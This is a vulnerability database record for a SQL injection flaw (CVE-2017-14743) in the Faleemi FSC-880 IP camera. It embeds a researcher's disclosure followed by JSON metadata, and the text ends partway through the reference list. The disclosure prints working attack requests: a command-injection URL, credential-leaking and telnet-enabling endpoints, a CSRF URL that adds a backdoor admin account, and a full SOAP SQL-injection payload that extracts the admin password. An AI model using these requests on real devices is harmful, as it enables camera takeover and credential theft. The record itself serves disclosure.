Search

Find a vulnerability

Search criteria

    1 vulnerability found for fsc-880 by faleemi

    VAR-201709-0746

    Vulnerability from variot - Updated: 2025-04-20 23:04

    Faleemi FSC-880 00.01.01.0048P2 devices allow unauthenticated SQL injection via the Username element in an XML document to /onvif/device_service, as demonstrated by reading the admin password. Faleemi FSC-880 Is SQL An injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. FaleemiFSC-880 is a network camera product from Faleemi, USA. A SQL injection vulnerability exists in the FaleemiFSC-88000.01.01.0048P2 release. This vulnerability can be exploited by a remote attacker to read the administrator password. Full disclosure is here: https://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce https://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce

    ===

    Timeline:

    25 August 2017: the research was made
    29 August 2017: an email was sent to the vendor, but with no answer
    25 September 2017: public disclosure
    26 September 2017: assigned CVE-2017a14743
    

    https://www.faleemi.com/product/fsc880-1080p-wirelee-ip-camera/

    Firmware: 00.01.01.0048P2 (2017-07-27)

    This camera has multiple security vulnerabilities, which can be exploited both locally and remotely. In particular, hardwired manufacturer DDNS and port-mapping to camera via upnp compatible router. Allowing for the discovered avoidance of authentication and RCE, this camera is an ideal candidate for another botnet such as Mirai.

    CVE-2017a14743

    Vulnerabilities

    RCE

    Works in stock firmware 00.01.01.0046 (E2017a03-**)

    In the latest firmware (00.01.01.0048P2 (2017a07a27)) this is fixedaaaftp client is removed. It is not in processes and in file systemaaaostensibly because realization was altered.

    Remote code execution in admin panel in GET parameters of Ft server scenario

    http://IP/hy-cgi/ftp.cgi?cmd=setftpattr&ft_server=;RCE;&ftp_port==25&ft_username=&ft_password=&ft_dirname=

    RCE2 (LAN)

    During analysis and reversing of the firmware we found and undocumented functionaaait is possible to quite simply turn on telnet on the device:

    Turn on telnet on port 23 http://192.168.0.100/hy-cgi/factory_param.cgi?cmd=settelnetstatus&enable=1

    Check status http://192.168.0.100/hy-cgi/factory_param.cgi?cmd=gettelnetstatus

    Password protected Telnetaaasame as on web panel but with one exception: telnet is not connected to upnp. This suggests that port is not accessible outside LAN.

    We have so far been unable to connect it because we have not found custom settings of doing so to upnp.

    enable upnp: http://192.168.0.100/hy-cgi/net.cgi?cmd=setupnpattr&upnp_enable=1

    upnp status: http://192.168.0.100/hy-cgi/net.cgi?cmd=getupnpattr&cmd=getupnpmap&cmd=getupnptmstatus Plaintext passwords

    User passwords are stored on the device in plaintext format in several locations simultaneously:

    /etc/webserver/lighttpd.user /mnt/mtd/db/ipcsys.db

    Passwords are synchronised when changed. Information Disclosure

    Prior 00.01.01.0048P2 (2017a07a27)aaa0DAY

    Device Info: http://192.168.0.100/hy-cgi/device.cgi?cmd=getdeviceinfo

    WIFI credentials leak: http://192.168.0.100/hy-cgi/wifi.cgi?cmd=getwifiattr

    Current user credentials leak: http://192.168.0.100/hy-cgi/user.cgi?cmd=checkuserinfo

    All users credentials leak: http://192.168.0.100/hy-cgi/user.cgi?cmd=getuserattr

    Third Party DDNS credentials leak: http://192.168.0.100/hy-cgi/ddns.cgi?cmd=get3thddnsattr

    Manufactureras DDNS credentials leak: http://192.168.0.100/hy-cgi/factory_param.cgi?cmd=getddns

    SMTP settings and credentials leak: http://192.168.0.100/hy-cgi/smtp.cgi?cmd=getsmtpattr

    FTP settings and credentials leak: http://192.168.0.100/hy-cgi/ftp.cgi?cmd=getftpattr

    CSRF

    Prior 00.01.01.0048P2 (2017a07a27)aaa0DAY

    http://192.168.8.102/hy-cgi/device.cgi?cmd=sysreboot http://192.168.0.100/hy-cgi/log.cgi?cmd=deloperlog http://192.168.0.100/hy-cgi/log.cgi?cmd=cleanlog http://192.168.0.100/hy-cgi/user.cgi?cmd=adduser&at_username=BACKDOOR_ADMIN&at_password=BACKDOOR_PASSWORD&at_rolename=admin

    All changes in camera settings go through GET commands and donat use CSRF tokens.

    The following functions can be executed remotely:

    Configure Camera
    Format SD card
    Delete Logs
    Steal image from camera
    

    These actions and commands can be executed from admin browser. The indecent hacker only needs to lure the admin to their page.

    Similar attacks on routers have been registered in the past: http://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.html

    And some more epic stuff Manufactureras DDNS enumeration

    There are hardwired DDNS manufacturer settings found in the device. The device sends an http request using udp www.nwsvr1.com, and sends its internal address and admin web panel IP address to API http://www.nwsvr1.com/api/userip.asp

    The device we researched has DDNS name 009lfld.nwsvr1.com. Knowing that device names are generated automatically, it is possible to enumerate the entire range of names using a mask 00\d[a-z]{4}.nwsvr1.com and obtain a full list of devices in the network.

    We found a total of 758000 devices, which connected with this DDNS at least once in the past.

    These are cameras by different manufacturers, that are somehow related to each other.

    Around 3% of devices are in the network.. HK 18.41% US 12.72% DE 9.94% ES 6.77% FR 5.66% AR 5.09% GB 5.00% DK 3.79% IT 3.34% PL 3.04% MX 1.90% CN 1.55% VN 1.53% JP 1.53% HU 1.40% CL 1.27% BR 1.20% TH 1.19%

    A little over 20% of all devices use a default password. Virtually all devices are accessible by ONVIF

    A similar number (20a25 thousands devices are online) are vulnerable to auth bypass via sqli.

    We have serious concerns that the DDNs password, which is hardwired into the device by the manufacturer is incremental. This means that it is possible to reverse-calculate the password to the camera based on its DDNS name.

    This raises the risk of the password being hijacked if the IP cards are switched on DDNS server, then redirected the admin using a camera with a DDNS name and grabs the password using his own authentication form.

    Authorization bypass via blind SQLi

    Prior 00.01.01.0048P2 (2017a07a27)aaa0DAY

    A device without authentication on web-port has an accessible endpoint by default /onvif/

    ONVIF is an API standard for such devices. WSDL can be downloaded from the official website (www.onvif.org).

    API uses authentication by tokens. Using this it is possible to obtain an admin password.

    Example of the exploit:

    / https://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce /

    POST /onvif/device_service HTTP/1.1 Content-Type: application/soap+xml Content-Length: 1076 charset: utf-8 Host: 192.168.0.100 Connection: close

    adfgadfhart' AND 1=2 UNION SELECT 1,'admin',(select unicode(substr(C_PassWord, 2, 1)) from t_user limit 1 OFF SET 0),'remark'/* UHZj ybNG8udkMEflf+LjkCUmR88= fD nW+mqvvsID/WJGNR6QWQ== 1970-01-01T00:03:58 .674Z

    To do this, the date and time set in the device are needed because they are used to build the password field of the authentication token.

    We drafted this POC, which allows to extract from the camera a password and gain entry to the device using admin credentials.

    This research was made by IoTSploit Team. Feel free to contact us at oleg@iotsploit.co and visit our website at https://iotsploit.co/

    If you have any active contact with Faleemi, please, show them this report and we are ready to coop

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201709-0746",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "fsc-880",
            "scope": "eq",
            "trust": 2.4,
            "vendor": "faleemi",
            "version": "00.01.01.0048p2"
          },
          {
            "model": "fsc-880 00.01.01.0048p2",
            "scope": null,
            "trust": 0.6,
            "vendor": "faleemi",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-31141"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-008555"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201709-1229"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-14743"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:faleemi:fsc-880_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-008555"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Oleg Puzanov",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "144392"
          }
        ],
        "trust": 0.1
      },
      "cve": "CVE-2017-14743",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2017-14743",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.6,
                "id": "CNVD-2017-31141",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.6,
                "id": "VHN-105496",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 8.1,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.2,
                "id": "CVE-2017-14743",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2017-14743",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2017-14743",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2017-31141",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201709-1229",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-105496",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-31141"
          },
          {
            "db": "VULHUB",
            "id": "VHN-105496"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-008555"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201709-1229"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-14743"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Faleemi FSC-880 00.01.01.0048P2 devices allow unauthenticated SQL injection via the Username element in an XML document to /onvif/device_service, as demonstrated by reading the admin password. Faleemi FSC-880 Is SQL An injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. FaleemiFSC-880 is a network camera product from Faleemi, USA. A SQL injection vulnerability exists in the FaleemiFSC-88000.01.01.0048P2 release. This vulnerability can be exploited by a remote attacker to read the administrator password. Full disclosure is here: https://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce \u003chttps://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce\u003e\n\n===\n\nTimeline:\n\n    25 August 2017: the research was made\n    29 August 2017: an email was sent to the vendor, but with no answer\n    25 September 2017: public disclosure\n    26 September 2017: assigned CVE-2017a14743\n\nhttps://www.faleemi.com/product/fsc880-1080p-wirelee-ip-camera/\n\nFirmware: 00.01.01.0048P2 (2017-07-27)\n\nThis camera has multiple security vulnerabilities, which can be exploited both locally and remotely. In particular, hardwired manufacturer DDNS and port-mapping to camera via upnp compatible router. Allowing for the discovered avoidance of authentication and RCE, this camera is an ideal candidate for another botnet such as Mirai. \n\n\nCVE-2017a14743\n\nVulnerabilities\n\nRCE\n\nWorks in stock firmware 00.01.01.0046 (E2017a03-**)\n\nIn the latest firmware (00.01.01.0048P2 (2017a07a27)) this is fixedaaaftp client is removed. It is not in processes and in file systemaaaostensibly because realization was altered. \n\nRemote code execution in admin panel in GET parameters of Ft server scenario\n\nhttp://IP/hy-cgi/ftp.cgi?cmd=setftpattr\u0026ft_server=;RCE;\u0026ftp_port==25\u0026ft_username=\u0026ft_password=\u0026ft_dirname=\n\nRCE2 (LAN)\n\nDuring analysis and reversing of the firmware we found and undocumented functionaaait is possible to quite simply turn on telnet on the device:\n\nTurn on telnet on port 23\nhttp://192.168.0.100/hy-cgi/factory_param.cgi?cmd=settelnetstatus\u0026enable=1\n\nCheck status\nhttp://192.168.0.100/hy-cgi/factory_param.cgi?cmd=gettelnetstatus\n\nPassword protected Telnetaaasame as on web panel but with one exception: telnet is not connected to upnp. This suggests that port is not accessible outside LAN. \n\nWe have so far been unable to connect it because we have not found custom settings of doing so to upnp. \n\nenable upnp:\nhttp://192.168.0.100/hy-cgi/net.cgi?cmd=setupnpattr\u0026upnp_enable=1\n\nupnp status:\nhttp://192.168.0.100/hy-cgi/net.cgi?cmd=getupnpattr\u0026cmd=getupnpmap\u0026cmd=getupnptmstatus\nPlaintext passwords\n\nUser passwords are stored on the device in plaintext format in several locations simultaneously:\n\n/etc/webserver/lighttpd.user\n/mnt/mtd/db/ipcsys.db\n\nPasswords are synchronised when changed. \nInformation Disclosure\n\nPrior 00.01.01.0048P2 (2017a07a27)aaa0DAY\n\nDevice Info:\nhttp://192.168.0.100/hy-cgi/device.cgi?cmd=getdeviceinfo\n\nWIFI credentials leak:\nhttp://192.168.0.100/hy-cgi/wifi.cgi?cmd=getwifiattr\n\nCurrent user credentials leak:\nhttp://192.168.0.100/hy-cgi/user.cgi?cmd=checkuserinfo\n\nAll users credentials leak:\nhttp://192.168.0.100/hy-cgi/user.cgi?cmd=getuserattr\n\nThird Party DDNS credentials leak:\nhttp://192.168.0.100/hy-cgi/ddns.cgi?cmd=get3thddnsattr\n\nManufactureras DDNS credentials leak:\nhttp://192.168.0.100/hy-cgi/factory_param.cgi?cmd=getddns\n\nSMTP settings and credentials leak:\nhttp://192.168.0.100/hy-cgi/smtp.cgi?cmd=getsmtpattr\n\nFTP settings and credentials leak:\nhttp://192.168.0.100/hy-cgi/ftp.cgi?cmd=getftpattr\n\nCSRF\n\nPrior 00.01.01.0048P2 (2017a07a27)aaa0DAY\n\nhttp://192.168.8.102/hy-cgi/device.cgi?cmd=sysreboot\nhttp://192.168.0.100/hy-cgi/log.cgi?cmd=deloperlog\nhttp://192.168.0.100/hy-cgi/log.cgi?cmd=cleanlog\nhttp://192.168.0.100/hy-cgi/user.cgi?cmd=adduser\u0026at_username=BACKDOOR_ADMIN\u0026at_password=BACKDOOR_PASSWORD\u0026at_rolename=admin\n\nAll changes in camera settings go through GET commands and donat use CSRF tokens. \n\nThe following functions can be executed remotely:\n\n    Configure Camera\n    Format SD card\n    Delete Logs\n    Steal image from camera\n\nThese actions and commands can be executed from admin browser. The indecent hacker only needs to lure the admin to their page. \n\nSimilar attacks on routers have been registered in the past: http://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.html\n\nAnd some more epic stuff\nManufactureras DDNS enumeration\n\nThere are hardwired DDNS manufacturer settings found in the device. The device sends an http request using udp www.nwsvr1.com, and sends its internal address and admin web panel IP address to API http://www.nwsvr1.com/api/userip.asp\n\nThe device we researched has DDNS name 009lfld.nwsvr1.com. Knowing that device names are generated automatically, it is possible to enumerate the entire range of names using a mask 00\\d[a-z]{4}.nwsvr1.com and obtain a full list of devices in the network. \n\nWe found a total of 758000 devices, which connected with this DDNS at least once in the past. \n\nThese are cameras by different manufacturers, that are somehow related to each other. \n\nAround 3% of devices are in the network.. \nHK 18.41%\nUS 12.72%\nDE 9.94%\nES 6.77%\nFR 5.66%\nAR 5.09%\nGB 5.00%\nDK 3.79%\nIT 3.34%\nPL 3.04%\nMX 1.90%\nCN 1.55%\nVN 1.53%\nJP 1.53%\nHU 1.40%\nCL 1.27%\nBR 1.20%\nTH 1.19%\n\nA little over 20% of all devices use a default password. Virtually all devices are accessible by ONVIF\n\nA similar number (20a25 thousands devices are online) are vulnerable to auth bypass via sqli. \n\nWe have serious concerns that the DDNs password, which is hardwired into the device by the manufacturer is incremental. This means that it is possible to reverse-calculate the password to the camera based on its DDNS name. \n\nThis raises the risk of the password being hijacked if the IP cards are switched on DDNS server, then redirected the admin using a camera with a DDNS name and grabs the password using his own authentication form. \n\nAuthorization bypass via blind SQLi\n\nPrior 00.01.01.0048P2 (2017a07a27)aaa0DAY\n\nA device without authentication on web-port has an accessible endpoint by default /onvif/\n\nONVIF is an API standard for such devices. WSDL can be downloaded from the official website (www.onvif.org). \n\nAPI uses authentication by tokens. Using this it is possible to obtain an admin password. \n\nExample of the exploit:\n\n\n/* https://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce */\n\nPOST /onvif/device_service HTTP/1.1\nContent-Type: application/soap+xml\nContent-Length: 1076\ncharset: utf-8\nHost: 192.168.0.100\nConnection: close\n\n\u003cs:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://www.w3.org/2005/08/addressing\"\u003e\n\u003cs:Header\u003e\n\u003cSecurity s:mustUnderstand=\"1\" xmlns=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd\"\u003e\n\u003cUsernameToken\u003e\n\u003cUsername\u003eadfgadfhart\u0027 AND 1=2 UNION SELECT 1,\u0027admin\u0027,(select unicode(substr(C_PassWord, 2, 1)) from t_user limit 1 OFF\nSET 0),\u0027remark\u0027/*\u003c/Username\u003e\n\u003cPassword Type=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest\"\u003eUHZj\nybNG8udkMEflf+LjkCUmR88=\u003c/Password\u003e\n\u003cNonce EncodingType=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary\"\u003efD\nnW+mqvvsID/WJGNR6QWQ==\u003c/Nonce\u003e\n\u003cCreated xmlns=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd\"\u003e1970-01-01T00:03:58\n.674Z\u003c/Created\u003e\n\u003c/UsernameToken\u003e\n\u003c/Security\u003e\n\u003c/s:Header\u003e\n\u003cs:Body xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\u003e\n\u003cGetDeviceInformation xmlns=\"http://www.onvif.org/ver10/device/wsdl\"/\u003e\n\u003c/s:Body\u003e\n\u003c/s:Envelope\u003e\n\n\nTo do this, the date and time set in the device are needed because they are used to build the password field of the authentication token. \n\nWe drafted this POC, which allows to extract from the camera a password and gain entry to the device using admin credentials. \n\nThis research was made by IoTSploit Team. Feel free to contact us at oleg@iotsploit.co and visit our website at https://iotsploit.co/\n\nIf you have any active contact with Faleemi, please, show them this report and we are ready to coop",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-14743"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-008555"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-31141"
          },
          {
            "db": "VULHUB",
            "id": "VHN-105496"
          },
          {
            "db": "PACKETSTORM",
            "id": "144392"
          }
        ],
        "trust": 2.34
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-105496",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-105496"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2017-14743",
            "trust": 3.2
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-008555",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201709-1229",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-31141",
            "trust": 0.6
          },
          {
            "db": "PACKETSTORM",
            "id": "144392",
            "trust": 0.2
          },
          {
            "db": "VULHUB",
            "id": "VHN-105496",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-31141"
          },
          {
            "db": "VULHUB",
            "id": "VHN-105496"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-008555"
          },
          {
            "db": "PACKETSTORM",
            "id": "144392"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201709-1229"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-14743"
          }
        ]
      },
      "id": "VAR-201709-0746",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-31141"
          },
          {
            "db": "VULHUB",
            "id": "VHN-105496"
          }
        ],
        "trust": 1.325
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-31141"
          }
        ]
      },
      "last_update_date": "2025-04-20T23:04:17.229000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.faleemi.com/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-008555"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-89",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-105496"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-008555"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-14743"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.6,
            "url": "https://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce"
          },
          {
            "trust": 1.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14743"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14743"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/log.cgi?cmd=deloperlog"
          },
          {
            "trust": 0.1,
            "url": "https://www.faleemi.com/product/fsc880-1080p-wirelee-ip-camera/"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/wifi.cgi?cmd=getwifiattr"
          },
          {
            "trust": 0.1,
            "url": "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#passworddigest\"\u003euhzj"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/net.cgi?cmd=getupnpattr\u0026cmd=getupnpmap\u0026cmd=getupnptmstatus"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.8.102/hy-cgi/device.cgi?cmd=sysreboot"
          },
          {
            "trust": 0.1,
            "url": "http://www.w3.org/2001/xmlschema\"\u003e"
          },
          {
            "trust": 0.1,
            "url": "https://www.nwsvr1.com,"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/device.cgi?cmd=getdeviceinfo"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/user.cgi?cmd=getuserattr"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/ftp.cgi?cmd=getftpattr"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/factory_param.cgi?cmd=getddns"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/factory_param.cgi?cmd=settelnetstatus\u0026enable=1"
          },
          {
            "trust": 0.1,
            "url": "http://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.html"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/user.cgi?cmd=adduser\u0026at_username=backdoor_admin\u0026at_password=backdoor_password\u0026at_rolename=admin"
          },
          {
            "trust": 0.1,
            "url": "http://www.nwsvr1.com/api/userip.asp"
          },
          {
            "trust": 0.1,
            "url": "http://www.w3.org/2001/xmlschema-instance\""
          },
          {
            "trust": 0.1,
            "url": "https://www.onvif.org)."
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/smtp.cgi?cmd=getsmtpattr"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/net.cgi?cmd=setupnpattr\u0026upnp_enable=1"
          },
          {
            "trust": 0.1,
            "url": "http://192.168.0.100/hy-cgi/log.cgi?cmd=cleanlog"
          },
          {
            "trust": 0.1,
